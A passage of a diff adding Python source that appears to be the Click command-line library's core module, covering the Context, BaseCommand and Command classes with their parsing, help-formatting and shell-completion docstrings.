processing. 
+ :param help_option_names: optionally a list of strings that define how + the default help parameter is named. The + default is ``['--help']``. + :param token_normalize_func: an optional function that is used to + normalize tokens (options, choices, + etc.). This for instance can be used to + implement case insensitive behavior. + :param color: controls if the terminal supports ANSI colors or not. The + default is autodetection. This is only needed if ANSI + codes are used in texts that Click prints which is by + default not the case. This for instance would affect + help output. + :param show_default: Show the default value for commands. If this + value is not set, it defaults to the value from the parent + context. ``Command.show_default`` overrides this default for the + specific command. + + .. versionchanged:: 8.1 + The ``show_default`` parameter is overridden by + ``Command.show_default``, instead of the other way around. + + .. versionchanged:: 8.0 + The ``show_default`` parameter defaults to the value from the + parent context. + + .. versionchanged:: 7.1 + Added the ``show_default`` parameter. + + .. versionchanged:: 4.0 + Added the ``color``, ``ignore_unknown_options``, and + ``max_content_width`` parameters. + + .. versionchanged:: 3.0 + Added the ``allow_extra_args`` and ``allow_interspersed_args`` + parameters. + + .. versionchanged:: 2.0 + Added the ``resilient_parsing``, ``help_option_names``, and + ``token_normalize_func`` parameters. + """ + + #: The formatter class to create with :meth:`make_formatter`. + #: + #: .. versionadded:: 8.0 + formatter_class: t.Type["HelpFormatter"] = HelpFormatter + + def __init__( + self, + command: "Command", + parent: t.Optional["Context"] = None, + info_name: t.Optional[str] = None, + obj: t.Optional[t.Any] = None, + auto_envvar_prefix: t.Optional[str] = None, + default_map: t.Optional[t.MutableMapping[str, t.Any]] = None, + terminal_width: t.Optional[int] = None, + max_content_width: t.Optional[int] = None, + resilient_parsing: bool = False, + allow_extra_args: t.Optional[bool] = None, + allow_interspersed_args: t.Optional[bool] = None, + ignore_unknown_options: t.Optional[bool] = None, + help_option_names: t.Optional[t.List[str]] = None, + token_normalize_func: t.Optional[t.Callable[[str], str]] = None, + color: t.Optional[bool] = None, + show_default: t.Optional[bool] = None, + ) -> None: + #: the parent context or `None` if none exists. + self.parent = parent + #: the :class:`Command` for this context. + self.command = command + #: the descriptive information name + self.info_name = info_name + #: Map of parameter names to their parsed values. Parameters + #: with ``expose_value=False`` are not stored. + self.params: t.Dict[str, t.Any] = {} + #: the leftover arguments. + self.args: t.List[str] = [] + #: protected arguments. These are arguments that are prepended + #: to `args` when certain parsing scenarios are encountered but + #: must be never propagated to another arguments. This is used + #: to implement nested parsing. + self.protected_args: t.List[str] = [] + #: the collected prefixes of the command's options. + self._opt_prefixes: t.Set[str] = set(parent._opt_prefixes) if parent else set() + + if obj is None and parent is not None: + obj = parent.obj + + #: the user object stored. + self.obj: t.Any = obj + self._meta: t.Dict[str, t.Any] = getattr(parent, "meta", {}) + + #: A dictionary (-like object) with defaults for parameters. 
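+        #: For groups the mapping may be nested per subcommand, e.g.
+        #: ``{"debug": True, "runserver": {"port": 5000}}`` (illustrative
+        #: values); the nested part is looked up below via
+        #: ``parent.default_map.get(info_name)``.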
+ if ( + default_map is None + and info_name is not None + and parent is not None + and parent.default_map is not None + ): + default_map = parent.default_map.get(info_name) + + self.default_map: t.Optional[t.MutableMapping[str, t.Any]] = default_map + + #: This flag indicates if a subcommand is going to be executed. A + #: group callback can use this information to figure out if it's + #: being executed directly or because the execution flow passes + #: onwards to a subcommand. By default it's None, but it can be + #: the name of the subcommand to execute. + #: + #: If chaining is enabled this will be set to ``'*'`` in case + #: any commands are executed. It is however not possible to + #: figure out which ones. If you require this knowledge you + #: should use a :func:`result_callback`. + self.invoked_subcommand: t.Optional[str] = None + + if terminal_width is None and parent is not None: + terminal_width = parent.terminal_width + + #: The width of the terminal (None is autodetection). + self.terminal_width: t.Optional[int] = terminal_width + + if max_content_width is None and parent is not None: + max_content_width = parent.max_content_width + + #: The maximum width of formatted content (None implies a sensible + #: default which is 80 for most things). + self.max_content_width: t.Optional[int] = max_content_width + + if allow_extra_args is None: + allow_extra_args = command.allow_extra_args + + #: Indicates if the context allows extra args or if it should + #: fail on parsing. + #: + #: .. versionadded:: 3.0 + self.allow_extra_args = allow_extra_args + + if allow_interspersed_args is None: + allow_interspersed_args = command.allow_interspersed_args + + #: Indicates if the context allows mixing of arguments and + #: options or not. + #: + #: .. versionadded:: 3.0 + self.allow_interspersed_args: bool = allow_interspersed_args + + if ignore_unknown_options is None: + ignore_unknown_options = command.ignore_unknown_options + + #: Instructs click to ignore options that a command does not + #: understand and will store it on the context for later + #: processing. This is primarily useful for situations where you + #: want to call into external programs. Generally this pattern is + #: strongly discouraged because it's not possibly to losslessly + #: forward all arguments. + #: + #: .. versionadded:: 4.0 + self.ignore_unknown_options: bool = ignore_unknown_options + + if help_option_names is None: + if parent is not None: + help_option_names = parent.help_option_names + else: + help_option_names = ["--help"] + + #: The names for the help options. + self.help_option_names: t.List[str] = help_option_names + + if token_normalize_func is None and parent is not None: + token_normalize_func = parent.token_normalize_func + + #: An optional normalization function for tokens. This is + #: options, choices, commands etc. + self.token_normalize_func: t.Optional[ + t.Callable[[str], str] + ] = token_normalize_func + + #: Indicates if resilient parsing is enabled. In that case Click + #: will do its best to not cause any failures and default values + #: will be ignored. Useful for completion. + self.resilient_parsing: bool = resilient_parsing + + # If there is no envvar prefix yet, but the parent has one and + # the command on this level has a name, we can expand the envvar + # prefix automatically. 
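+        # For example (hypothetical names): a parent prefix of "MYTOOL" and a
+        # subcommand with info name "serve" expand to "MYTOOL_SERVE", so an
+        # option "--port" on that subcommand reads MYTOOL_SERVE_PORT.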
+ if auto_envvar_prefix is None: + if ( + parent is not None + and parent.auto_envvar_prefix is not None + and self.info_name is not None + ): + auto_envvar_prefix = ( + f"{parent.auto_envvar_prefix}_{self.info_name.upper()}" + ) + else: + auto_envvar_prefix = auto_envvar_prefix.upper() + + if auto_envvar_prefix is not None: + auto_envvar_prefix = auto_envvar_prefix.replace("-", "_") + + self.auto_envvar_prefix: t.Optional[str] = auto_envvar_prefix + + if color is None and parent is not None: + color = parent.color + + #: Controls if styling output is wanted or not. + self.color: t.Optional[bool] = color + + if show_default is None and parent is not None: + show_default = parent.show_default + + #: Show option default values when formatting help text. + self.show_default: t.Optional[bool] = show_default + + self._close_callbacks: t.List[t.Callable[[], t.Any]] = [] + self._depth = 0 + self._parameter_source: t.Dict[str, ParameterSource] = {} + self._exit_stack = ExitStack() + + def to_info_dict(self) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. This traverses the entire CLI + structure. + + .. code-block:: python + + with Context(cli) as ctx: + info = ctx.to_info_dict() + + .. versionadded:: 8.0 + """ + return { + "command": self.command.to_info_dict(self), + "info_name": self.info_name, + "allow_extra_args": self.allow_extra_args, + "allow_interspersed_args": self.allow_interspersed_args, + "ignore_unknown_options": self.ignore_unknown_options, + "auto_envvar_prefix": self.auto_envvar_prefix, + } + + def __enter__(self) -> "Context": + self._depth += 1 + push_context(self) + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + self._depth -= 1 + if self._depth == 0: + self.close() + pop_context() + + @contextmanager + def scope(self, cleanup: bool = True) -> t.Iterator["Context"]: + """This helper method can be used with the context object to promote + it to the current thread local (see :func:`get_current_context`). + The default behavior of this is to invoke the cleanup functions which + can be disabled by setting `cleanup` to `False`. The cleanup + functions are typically used for things such as closing file handles. + + If the cleanup is intended the context object can also be directly + used as a context manager. + + Example usage:: + + with ctx.scope(): + assert get_current_context() is ctx + + This is equivalent:: + + with ctx: + assert get_current_context() is ctx + + .. versionadded:: 5.0 + + :param cleanup: controls if the cleanup functions should be run or + not. The default is to run these functions. In + some situations the context only wants to be + temporarily pushed in which case this can be disabled. + Nested pushes automatically defer the cleanup. + """ + if not cleanup: + self._depth += 1 + try: + with self as rv: + yield rv + finally: + if not cleanup: + self._depth -= 1 + + @property + def meta(self) -> t.Dict[str, t.Any]: + """This is a dictionary which is shared with all the contexts + that are nested. It exists so that click utilities can store some + state here if they need to. It is however the responsibility of + that code to manage this dictionary well. + + The keys are supposed to be unique dotted strings. For instance + module paths are a good choice for it. What is stored in there is + irrelevant for the operation of click. 
However what is important is + that code that places data here adheres to the general semantics of + the system. + + Example usage:: + + LANG_KEY = f'{__name__}.lang' + + def set_language(value): + ctx = get_current_context() + ctx.meta[LANG_KEY] = value + + def get_language(): + return get_current_context().meta.get(LANG_KEY, 'en_US') + + .. versionadded:: 5.0 + """ + return self._meta + + def make_formatter(self) -> HelpFormatter: + """Creates the :class:`~click.HelpFormatter` for the help and + usage output. + + To quickly customize the formatter class used without overriding + this method, set the :attr:`formatter_class` attribute. + + .. versionchanged:: 8.0 + Added the :attr:`formatter_class` attribute. + """ + return self.formatter_class( + width=self.terminal_width, max_width=self.max_content_width + ) + + def with_resource(self, context_manager: t.ContextManager[V]) -> V: + """Register a resource as if it were used in a ``with`` + statement. The resource will be cleaned up when the context is + popped. + + Uses :meth:`contextlib.ExitStack.enter_context`. It calls the + resource's ``__enter__()`` method and returns the result. When + the context is popped, it closes the stack, which calls the + resource's ``__exit__()`` method. + + To register a cleanup function for something that isn't a + context manager, use :meth:`call_on_close`. Or use something + from :mod:`contextlib` to turn it into a context manager first. + + .. code-block:: python + + @click.group() + @click.option("--name") + @click.pass_context + def cli(ctx): + ctx.obj = ctx.with_resource(connect_db(name)) + + :param context_manager: The context manager to enter. + :return: Whatever ``context_manager.__enter__()`` returns. + + .. versionadded:: 8.0 + """ + return self._exit_stack.enter_context(context_manager) + + def call_on_close(self, f: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]: + """Register a function to be called when the context tears down. + + This can be used to close resources opened during the script + execution. Resources that support Python's context manager + protocol which would be used in a ``with`` statement should be + registered with :meth:`with_resource` instead. + + :param f: The function to execute on teardown. + """ + return self._exit_stack.callback(f) + + def close(self) -> None: + """Invoke all close callbacks registered with + :meth:`call_on_close`, and exit all context managers entered + with :meth:`with_resource`. + """ + self._exit_stack.close() + # In case the context is reused, create a new exit stack. + self._exit_stack = ExitStack() + + @property + def command_path(self) -> str: + """The computed command path. This is used for the ``usage`` + information on the help page. It's automatically created by + combining the info names of the chain of contexts to the root. 
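+
+        For example, with a hypothetical group named ``cli`` that contains
+        a ``db`` group with an ``upgrade`` command, the ``upgrade`` context
+        reports ``cli db upgrade``.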
+ """ + rv = "" + if self.info_name is not None: + rv = self.info_name + if self.parent is not None: + parent_command_path = [self.parent.command_path] + + if isinstance(self.parent.command, Command): + for param in self.parent.command.get_params(self): + parent_command_path.extend(param.get_usage_pieces(self)) + + rv = f"{' '.join(parent_command_path)} {rv}" + return rv.lstrip() + + def find_root(self) -> "Context": + """Finds the outermost context.""" + node = self + while node.parent is not None: + node = node.parent + return node + + def find_object(self, object_type: t.Type[V]) -> t.Optional[V]: + """Finds the closest object of a given type.""" + node: t.Optional["Context"] = self + + while node is not None: + if isinstance(node.obj, object_type): + return node.obj + + node = node.parent + + return None + + def ensure_object(self, object_type: t.Type[V]) -> V: + """Like :meth:`find_object` but sets the innermost object to a + new instance of `object_type` if it does not exist. + """ + rv = self.find_object(object_type) + if rv is None: + self.obj = rv = object_type() + return rv + + @t.overload + def lookup_default( + self, name: str, call: "te.Literal[True]" = True + ) -> t.Optional[t.Any]: + ... + + @t.overload + def lookup_default( + self, name: str, call: "te.Literal[False]" = ... + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + ... + + def lookup_default(self, name: str, call: bool = True) -> t.Optional[t.Any]: + """Get the default for a parameter from :attr:`default_map`. + + :param name: Name of the parameter. + :param call: If the default is a callable, call it. Disable to + return the callable instead. + + .. versionchanged:: 8.0 + Added the ``call`` parameter. + """ + if self.default_map is not None: + value = self.default_map.get(name) + + if call and callable(value): + return value() + + return value + + return None + + def fail(self, message: str) -> "te.NoReturn": + """Aborts the execution of the program with a specific error + message. + + :param message: the error message to fail with. + """ + raise UsageError(message, self) + + def abort(self) -> "te.NoReturn": + """Aborts the script.""" + raise Abort() + + def exit(self, code: int = 0) -> "te.NoReturn": + """Exits the application with a given exit code.""" + raise Exit(code) + + def get_usage(self) -> str: + """Helper method to get formatted usage string for the current + context and command. + """ + return self.command.get_usage(self) + + def get_help(self) -> str: + """Helper method to get formatted help page for the current + context and command. + """ + return self.command.get_help(self) + + def _make_sub_context(self, command: "Command") -> "Context": + """Create a new context of the same type as this context, but + for a new command. + + :meta private: + """ + return type(self)(command, info_name=command.name, parent=self) + + @t.overload + def invoke( + __self, # noqa: B902 + __callback: "t.Callable[..., V]", + *args: t.Any, + **kwargs: t.Any, + ) -> V: + ... + + @t.overload + def invoke( + __self, # noqa: B902 + __callback: "Command", + *args: t.Any, + **kwargs: t.Any, + ) -> t.Any: + ... + + def invoke( + __self, # noqa: B902 + __callback: t.Union["Command", "t.Callable[..., V]"], + *args: t.Any, + **kwargs: t.Any, + ) -> t.Union[t.Any, V]: + """Invokes a command callback in exactly the way it expects. There + are two ways to invoke this method: + + 1. the first argument can be a callback and all other arguments and + keyword arguments are forwarded directly to the function. + 2. 
the first argument is a click command object. In that case all + arguments are forwarded as well but proper click parameters + (options and click arguments) must be keyword arguments and Click + will fill in defaults. + + Note that before Click 3.2 keyword arguments were not properly filled + in against the intention of this code and no context was created. For + more information about this change and why it was done in a bugfix + release see :ref:`upgrade-to-3.2`. + + .. versionchanged:: 8.0 + All ``kwargs`` are tracked in :attr:`params` so they will be + passed if :meth:`forward` is called at multiple levels. + """ + if isinstance(__callback, Command): + other_cmd = __callback + + if other_cmd.callback is None: + raise TypeError( + "The given command does not have a callback that can be invoked." + ) + else: + __callback = t.cast("t.Callable[..., V]", other_cmd.callback) + + ctx = __self._make_sub_context(other_cmd) + + for param in other_cmd.params: + if param.name not in kwargs and param.expose_value: + kwargs[param.name] = param.type_cast_value( # type: ignore + ctx, param.get_default(ctx) + ) + + # Track all kwargs as params, so that forward() will pass + # them on in subsequent calls. + ctx.params.update(kwargs) + else: + ctx = __self + + with augment_usage_errors(__self): + with ctx: + return __callback(*args, **kwargs) + + def forward( + __self, __cmd: "Command", *args: t.Any, **kwargs: t.Any # noqa: B902 + ) -> t.Any: + """Similar to :meth:`invoke` but fills in default keyword + arguments from the current context if the other command expects + it. This cannot invoke callbacks directly, only other commands. + + .. versionchanged:: 8.0 + All ``kwargs`` are tracked in :attr:`params` so they will be + passed if ``forward`` is called at multiple levels. + """ + # Can only forward to other commands, not direct callbacks. + if not isinstance(__cmd, Command): + raise TypeError("Callback is not a command.") + + for param in __self.params: + if param not in kwargs: + kwargs[param] = __self.params[param] + + return __self.invoke(__cmd, *args, **kwargs) + + def set_parameter_source(self, name: str, source: ParameterSource) -> None: + """Set the source of a parameter. This indicates the location + from which the value of the parameter was obtained. + + :param name: The name of the parameter. + :param source: A member of :class:`~click.core.ParameterSource`. + """ + self._parameter_source[name] = source + + def get_parameter_source(self, name: str) -> t.Optional[ParameterSource]: + """Get the source of a parameter. This indicates the location + from which the value of the parameter was obtained. + + This can be useful for determining when a user specified a value + on the command line that is the same as the default value. It + will be :attr:`~click.core.ParameterSource.DEFAULT` only if the + value was actually taken from the default. + + :param name: The name of the parameter. + :rtype: ParameterSource + + .. versionchanged:: 8.0 + Returns ``None`` if the parameter was not provided from any + source. + """ + return self._parameter_source.get(name) + + +class BaseCommand: + """The base command implements the minimal API contract of commands. + Most code will never use this as it does not implement a lot of useful + functionality but it can act as the direct subclass of alternative + parsing methods that do not depend on the Click parser. + + For instance, this can be used to bridge Click and other systems like + argparse or docopt. 
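+
+    A bridging subclass would typically override :meth:`parse_args` and
+    :meth:`invoke`; a rough sketch (``self._parser`` and ``self._callback``
+    are hypothetical attributes, not part of this class)::
+
+        class ArgparseCommand(BaseCommand):
+            def parse_args(self, ctx, args):
+                ctx.params = vars(self._parser.parse_args(args))
+                return []
+
+            def invoke(self, ctx):
+                return self._callback(**ctx.params)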
+ + Because base commands do not implement a lot of the API that other + parts of Click take for granted, they are not supported for all + operations. For instance, they cannot be used with the decorators + usually and they have no built-in callback system. + + .. versionchanged:: 2.0 + Added the `context_settings` parameter. + + :param name: the name of the command to use unless a group overrides it. + :param context_settings: an optional dictionary with defaults that are + passed to the context object. + """ + + #: The context class to create with :meth:`make_context`. + #: + #: .. versionadded:: 8.0 + context_class: t.Type[Context] = Context + #: the default for the :attr:`Context.allow_extra_args` flag. + allow_extra_args = False + #: the default for the :attr:`Context.allow_interspersed_args` flag. + allow_interspersed_args = True + #: the default for the :attr:`Context.ignore_unknown_options` flag. + ignore_unknown_options = False + + def __init__( + self, + name: t.Optional[str], + context_settings: t.Optional[t.MutableMapping[str, t.Any]] = None, + ) -> None: + #: the name the command thinks it has. Upon registering a command + #: on a :class:`Group` the group will default the command name + #: with this information. You should instead use the + #: :class:`Context`\'s :attr:`~Context.info_name` attribute. + self.name = name + + if context_settings is None: + context_settings = {} + + #: an optional dictionary with defaults passed to the context. + self.context_settings: t.MutableMapping[str, t.Any] = context_settings + + def to_info_dict(self, ctx: Context) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. This traverses the entire structure + below this command. + + Use :meth:`click.Context.to_info_dict` to traverse the entire + CLI structure. + + :param ctx: A :class:`Context` representing this command. + + .. versionadded:: 8.0 + """ + return {"name": self.name} + + def __repr__(self) -> str: + return f"<{self.__class__.__name__} {self.name}>" + + def get_usage(self, ctx: Context) -> str: + raise NotImplementedError("Base commands cannot get usage") + + def get_help(self, ctx: Context) -> str: + raise NotImplementedError("Base commands cannot get help") + + def make_context( + self, + info_name: t.Optional[str], + args: t.List[str], + parent: t.Optional[Context] = None, + **extra: t.Any, + ) -> Context: + """This function when given an info name and arguments will kick + off the parsing and create a new :class:`Context`. It does not + invoke the actual command callback though. + + To quickly customize the context class used without overriding + this method, set the :attr:`context_class` attribute. + + :param info_name: the info name for this invocation. Generally this + is the most descriptive name for the script or + command. For the toplevel script it's usually + the name of the script, for commands below it's + the name of the command. + :param args: the arguments to parse as list of strings. + :param parent: the parent context if available. + :param extra: extra keyword arguments forwarded to the context + constructor. + + .. versionchanged:: 8.0 + Added the :attr:`context_class` attribute. 
+ """ + for key, value in self.context_settings.items(): + if key not in extra: + extra[key] = value + + ctx = self.context_class( + self, info_name=info_name, parent=parent, **extra # type: ignore + ) + + with ctx.scope(cleanup=False): + self.parse_args(ctx, args) + return ctx + + def parse_args(self, ctx: Context, args: t.List[str]) -> t.List[str]: + """Given a context and a list of arguments this creates the parser + and parses the arguments, then modifies the context as necessary. + This is automatically invoked by :meth:`make_context`. + """ + raise NotImplementedError("Base commands do not know how to parse arguments.") + + def invoke(self, ctx: Context) -> t.Any: + """Given a context, this invokes the command. The default + implementation is raising a not implemented error. + """ + raise NotImplementedError("Base commands are not invocable by default") + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. Looks + at the names of chained multi-commands. + + Any command could be part of a chained multi-command, so sibling + commands are valid at any point during command completion. Other + command classes will return more completions. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + results: t.List["CompletionItem"] = [] + + while ctx.parent is not None: + ctx = ctx.parent + + if isinstance(ctx.command, MultiCommand) and ctx.command.chain: + results.extend( + CompletionItem(name, help=command.get_short_help_str()) + for name, command in _complete_visible_commands(ctx, incomplete) + if name not in ctx.protected_args + ) + + return results + + @t.overload + def main( + self, + args: t.Optional[t.Sequence[str]] = None, + prog_name: t.Optional[str] = None, + complete_var: t.Optional[str] = None, + standalone_mode: "te.Literal[True]" = True, + **extra: t.Any, + ) -> "te.NoReturn": + ... + + @t.overload + def main( + self, + args: t.Optional[t.Sequence[str]] = None, + prog_name: t.Optional[str] = None, + complete_var: t.Optional[str] = None, + standalone_mode: bool = ..., + **extra: t.Any, + ) -> t.Any: + ... + + def main( + self, + args: t.Optional[t.Sequence[str]] = None, + prog_name: t.Optional[str] = None, + complete_var: t.Optional[str] = None, + standalone_mode: bool = True, + windows_expand_args: bool = True, + **extra: t.Any, + ) -> t.Any: + """This is the way to invoke a script with all the bells and + whistles as a command line application. This will always terminate + the application after a call. If this is not wanted, ``SystemExit`` + needs to be caught. + + This method is also available by directly calling the instance of + a :class:`Command`. + + :param args: the arguments that should be used for parsing. If not + provided, ``sys.argv[1:]`` is used. + :param prog_name: the program name that should be used. By default + the program name is constructed by taking the file + name from ``sys.argv[0]``. + :param complete_var: the environment variable that controls the + bash completion support. The default is + ``"__COMPLETE"`` with prog_name in + uppercase. + :param standalone_mode: the default behavior is to invoke the script + in standalone mode. Click will then + handle exceptions and convert them into + error messages and the function will never + return but shut down the interpreter. 
If + this is set to `False` they will be + propagated to the caller and the return + value of this function is the return value + of :meth:`invoke`. + :param windows_expand_args: Expand glob patterns, user dir, and + env vars in command line args on Windows. + :param extra: extra keyword arguments are forwarded to the context + constructor. See :class:`Context` for more information. + + .. versionchanged:: 8.0.1 + Added the ``windows_expand_args`` parameter to allow + disabling command line arg expansion on Windows. + + .. versionchanged:: 8.0 + When taking arguments from ``sys.argv`` on Windows, glob + patterns, user dir, and env vars are expanded. + + .. versionchanged:: 3.0 + Added the ``standalone_mode`` parameter. + """ + if args is None: + args = sys.argv[1:] + + if os.name == "nt" and windows_expand_args: + args = _expand_args(args) + else: + args = list(args) + + if prog_name is None: + prog_name = _detect_program_name() + + # Process shell completion requests and exit early. + self._main_shell_completion(extra, prog_name, complete_var) + + try: + try: + with self.make_context(prog_name, args, **extra) as ctx: + rv = self.invoke(ctx) + if not standalone_mode: + return rv + # it's not safe to `ctx.exit(rv)` here! + # note that `rv` may actually contain data like "1" which + # has obvious effects + # more subtle case: `rv=[None, None]` can come out of + # chained commands which all returned `None` -- so it's not + # even always obvious that `rv` indicates success/failure + # by its truthiness/falsiness + ctx.exit() + except (EOFError, KeyboardInterrupt) as e: + echo(file=sys.stderr) + raise Abort() from e + except ClickException as e: + if not standalone_mode: + raise + e.show() + sys.exit(e.exit_code) + except OSError as e: + if e.errno == errno.EPIPE: + sys.stdout = t.cast(t.TextIO, PacifyFlushWrapper(sys.stdout)) + sys.stderr = t.cast(t.TextIO, PacifyFlushWrapper(sys.stderr)) + sys.exit(1) + else: + raise + except Exit as e: + if standalone_mode: + sys.exit(e.exit_code) + else: + # in non-standalone mode, return the exit code + # note that this is only reached if `self.invoke` above raises + # an Exit explicitly -- thus bypassing the check there which + # would return its result + # the results of non-standalone execution may therefore be + # somewhat ambiguous: if there are codepaths which lead to + # `ctx.exit(1)` and to `return 1`, the caller won't be able to + # tell the difference between the two + return e.exit_code + except Abort: + if not standalone_mode: + raise + echo(_("Aborted!"), file=sys.stderr) + sys.exit(1) + + def _main_shell_completion( + self, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + complete_var: t.Optional[str] = None, + ) -> None: + """Check if the shell is asking for tab completion, process + that, then exit early. Called from :meth:`main` before the + program is invoked. + + :param prog_name: Name of the executable in the shell. + :param complete_var: Name of the environment variable that holds + the completion instruction. Defaults to + ``_{PROG_NAME}_COMPLETE``. + + .. versionchanged:: 8.2.0 + Dots (``.``) in ``prog_name`` are replaced with underscores (``_``). 
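+
+        For example, a ``prog_name`` of ``my-tool.py`` (a hypothetical
+        program name) maps to the environment variable
+        ``_MY_TOOL_PY_COMPLETE``.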
+ """ + if complete_var is None: + complete_name = prog_name.replace("-", "_").replace(".", "_") + complete_var = f"_{complete_name}_COMPLETE".upper() + + instruction = os.environ.get(complete_var) + + if not instruction: + return + + from .shell_completion import shell_complete + + rv = shell_complete(self, ctx_args, prog_name, complete_var, instruction) + sys.exit(rv) + + def __call__(self, *args: t.Any, **kwargs: t.Any) -> t.Any: + """Alias for :meth:`main`.""" + return self.main(*args, **kwargs) + + +class Command(BaseCommand): + """Commands are the basic building block of command line interfaces in + Click. A basic command handles command line parsing and might dispatch + more parsing to commands nested below it. + + :param name: the name of the command to use unless a group overrides it. + :param context_settings: an optional dictionary with defaults that are + passed to the context object. + :param callback: the callback to invoke. This is optional. + :param params: the parameters to register with this command. This can + be either :class:`Option` or :class:`Argument` objects. + :param help: the help string to use for this command. + :param epilog: like the help string but it's printed at the end of the + help page after everything else. + :param short_help: the short help to use for this command. This is + shown on the command listing of the parent command. + :param add_help_option: by default each command registers a ``--help`` + option. This can be disabled by this parameter. + :param no_args_is_help: this controls what happens if no arguments are + provided. This option is disabled by default. + If enabled this will add ``--help`` as argument + if no arguments are passed + :param hidden: hide this command from help outputs. + + :param deprecated: issues a message indicating that + the command is deprecated. + + .. versionchanged:: 8.1 + ``help``, ``epilog``, and ``short_help`` are stored unprocessed, + all formatting is done when outputting help text, not at init, + and is done even if not using the ``@command`` decorator. + + .. versionchanged:: 8.0 + Added a ``repr`` showing the command name. + + .. versionchanged:: 7.1 + Added the ``no_args_is_help`` parameter. + + .. versionchanged:: 2.0 + Added the ``context_settings`` parameter. + """ + + def __init__( + self, + name: t.Optional[str], + context_settings: t.Optional[t.MutableMapping[str, t.Any]] = None, + callback: t.Optional[t.Callable[..., t.Any]] = None, + params: t.Optional[t.List["Parameter"]] = None, + help: t.Optional[str] = None, + epilog: t.Optional[str] = None, + short_help: t.Optional[str] = None, + options_metavar: t.Optional[str] = "[OPTIONS]", + add_help_option: bool = True, + no_args_is_help: bool = False, + hidden: bool = False, + deprecated: bool = False, + ) -> None: + super().__init__(name, context_settings) + #: the callback to execute when the command fires. This might be + #: `None` in which case nothing happens. + self.callback = callback + #: the list of parameters for this command in the order they + #: should show up in the help page and execute. Eager parameters + #: will automatically be handled before non eager ones. 
+ self.params: t.List["Parameter"] = params or [] + self.help = help + self.epilog = epilog + self.options_metavar = options_metavar + self.short_help = short_help + self.add_help_option = add_help_option + self.no_args_is_help = no_args_is_help + self.hidden = hidden + self.deprecated = deprecated + + def to_info_dict(self, ctx: Context) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict(ctx) + info_dict.update( + params=[param.to_info_dict() for param in self.get_params(ctx)], + help=self.help, + epilog=self.epilog, + short_help=self.short_help, + hidden=self.hidden, + deprecated=self.deprecated, + ) + return info_dict + + def get_usage(self, ctx: Context) -> str: + """Formats the usage line into a string and returns it. + + Calls :meth:`format_usage` internally. + """ + formatter = ctx.make_formatter() + self.format_usage(ctx, formatter) + return formatter.getvalue().rstrip("\n") + + def get_params(self, ctx: Context) -> t.List["Parameter"]: + rv = self.params + help_option = self.get_help_option(ctx) + + if help_option is not None: + rv = [*rv, help_option] + + return rv + + def format_usage(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the usage line into the formatter. + + This is a low-level method called by :meth:`get_usage`. + """ + pieces = self.collect_usage_pieces(ctx) + formatter.write_usage(ctx.command_path, " ".join(pieces)) + + def collect_usage_pieces(self, ctx: Context) -> t.List[str]: + """Returns all the pieces that go into the usage line and returns + it as a list of strings. + """ + rv = [self.options_metavar] if self.options_metavar else [] + + for param in self.get_params(ctx): + rv.extend(param.get_usage_pieces(ctx)) + + return rv + + def get_help_option_names(self, ctx: Context) -> t.List[str]: + """Returns the names for the help option.""" + all_names = set(ctx.help_option_names) + for param in self.params: + all_names.difference_update(param.opts) + all_names.difference_update(param.secondary_opts) + return list(all_names) + + def get_help_option(self, ctx: Context) -> t.Optional["Option"]: + """Returns the help option object.""" + help_options = self.get_help_option_names(ctx) + + if not help_options or not self.add_help_option: + return None + + def show_help(ctx: Context, param: "Parameter", value: str) -> None: + if value and not ctx.resilient_parsing: + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + return Option( + help_options, + is_flag=True, + is_eager=True, + expose_value=False, + callback=show_help, + help=_("Show this message and exit."), + ) + + def make_parser(self, ctx: Context) -> OptionParser: + """Creates the underlying option parser for this command.""" + parser = OptionParser(ctx) + for param in self.get_params(ctx): + param.add_to_parser(parser, ctx) + return parser + + def get_help(self, ctx: Context) -> str: + """Formats the help into a string and returns it. + + Calls :meth:`format_help` internally. + """ + formatter = ctx.make_formatter() + self.format_help(ctx, formatter) + return formatter.getvalue().rstrip("\n") + + def get_short_help_str(self, limit: int = 45) -> str: + """Gets short help for the command or makes it by shortening the + long help string. 
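The plumbing above (``params``, ``get_params``, ``get_help_option``, ``get_help``) is what a ``Command`` exposes when it is built directly rather than through the ``@click.command`` decorator. A minimal sketch, assuming only the public ``click`` package (the ``greet`` names are invented for illustration):

.. code-block:: python

    import click

    def greet(count, name):
        """Callback that receives the parsed parameter values."""
        for _ in range(count):
            click.echo(f"Hello, {name}!")

    # Construct the command object directly; this mirrors what the
    # @click.command decorator assembles from decorated options/arguments.
    cli = click.Command(
        "greet",
        params=[
            click.Option(["--count"], default=1, show_default=True, help="Number of greetings."),
            click.Argument(["name"]),
        ],
        callback=greet,
        help="Greet NAME one or more times.",
    )

    if __name__ == "__main__":
        cli()  # alias for cli.main(); parses sys.argv and runs the callback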
+ """ + if self.short_help: + text = inspect.cleandoc(self.short_help) + elif self.help: + text = make_default_short_help(self.help, limit) + else: + text = "" + + if self.deprecated: + text = _("(Deprecated) {text}").format(text=text) + + return text.strip() + + def format_help(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the help into the formatter if it exists. + + This is a low-level method called by :meth:`get_help`. + + This calls the following methods: + + - :meth:`format_usage` + - :meth:`format_help_text` + - :meth:`format_options` + - :meth:`format_epilog` + """ + self.format_usage(ctx, formatter) + self.format_help_text(ctx, formatter) + self.format_options(ctx, formatter) + self.format_epilog(ctx, formatter) + + def format_help_text(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the help text to the formatter if it exists.""" + if self.help is not None: + # truncate the help text to the first form feed + text = inspect.cleandoc(self.help).partition("\f")[0] + else: + text = "" + + if self.deprecated: + text = _("(Deprecated) {text}").format(text=text) + + if text: + formatter.write_paragraph() + + with formatter.indentation(): + formatter.write_text(text) + + def format_options(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes all the options into the formatter if they exist.""" + opts 